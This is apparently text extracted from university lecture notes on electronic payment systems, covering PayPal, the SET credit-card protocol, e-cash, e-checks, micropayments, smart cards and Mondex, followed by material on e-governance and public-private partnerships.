PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
